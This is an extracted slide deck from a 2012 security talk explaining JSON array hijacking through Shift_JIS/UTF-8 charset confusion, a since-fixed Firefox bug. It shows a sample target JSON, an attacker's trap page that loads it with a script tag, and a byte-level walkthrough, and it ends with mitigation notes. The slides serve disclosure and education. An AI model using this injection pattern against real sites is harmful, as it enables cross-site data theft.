JS Array Hijacking with MBCS encodings MBCS JS
JS Array Hijacking with MBCS encodings MBCS文字コードを使った JS配列の乗っ取り Apr 4 2012 Yosuke HASEGAWA
JS Array Hijacking with MBCS v. JSON配列を盗み見する方法 v文字コードの応用技 v. Mozilla Firefox 8 / MFSA 2011 -47で修 正済み Shibuya. XSS Net. Agent http: //www. netagent. co. jp/
JS Array Hijacking with MBCS ユーザ XHR. send(…) JSON. parse(txt) JSON [ "a@example. com", ". . . " ] Shibuya. XSS Web mail Net. Agent http: //www. netagent. co. jp/
JS Array Hijacking with MBCS HTML ユーザ <script src=“json”> 攻撃者 JSON <script src=“json”> From: ". . . 0 x 82" JSON [ ". . . 0 x 82", ". . . " ] Shibuya. XSS Web mail Net. Agent http: //www. netagent. co. jp/
JS Array Hijacking with MBCS 攻撃対象の JSON (UTF-8) Content-Type: application/json [ "あ", ", alert(/", "alice", "bob", "/. source)]//" ] 攻撃者の用意した罠ページ <script src="http: //example. jp/target. json" charset="shift_jis" ></script> Shibuya. XSS Net. Agent http: //www. netagent. co. jp/
JS Array Hijacking with MBCS 攻撃対象の JSON (UTF-8) Content-Type: application/json [ "あ", ", alert(/", "alice", "bob", "/. source)]//" ] UTF-8 " 22 Shift_JIS " あ E 3 81 縺 82 ? " , " a l e r t ( 22 2 C 22 61 6 C 65 72 74 28 , " a l e r t ( [ "縺<? >, ", alert(/", "alice", "bob", "/. source) ]//" ] Shibuya. XSS Net. Agent http: //www. netagent. co. jp/
JS Array Hijacking with MBCS 攻撃対象の JSON (UTF-8) Content-Type: application/json [ "あ", ", alert(/", "alice", "bob", "/. source)]//" ] UTF-8 " 22 Shift_JIS " " , " a l e r t ( 82 22 2 C 22 61 6 C 65 72 74 28 ? " , " a l e r t ( あ E 3 81 縺 [ "縺<? >", ", alert(/", "alice", "bob", "/. source)]//" ] 修正された挙動 (IEと同じ) Shibuya. XSS Net. Agent http: //www. netagent. co. jp/
JS Array Hijacking with MBCS まとめ vそもそもJSONのレスポンスに charsetつ けてないのがイケてない。 vとはいえRFC 4627には JSON text SHALL be encoded in Unicode. The default encoding is UTF-8. v攻撃可能なサイトは限定的 Shibuya. XSS Net. Agent http: //www. netagent. co. jp/
JS Array Hijacking with MBCS v MFSA 2011 -47: Potential XSS against sites using Shift-JIS http: //www. mozilla. org/security/announce/2011/mfsa 2011 -47. html v 690225 – Universal XSS likely with Multi. Byte charset (e. g. japanese sites) https: //bugzilla. mozilla. org/show_bug. cgi? id=690225 だいぶ盛りすぎ! もとのタイトルは "JSON hijacking with Multi. Byte charset" だったのに。 Shibuya. XSS Net. Agent http: //www. netagent. co. jp/
質問 hasegawa@utf-8. jp hasegawa@netagent. co. jp @hasegawayosuke http: //utf-8. jp/ Shibuya. XSS Net. Agent http: //www. netagent. co. jp/
- Slides: 12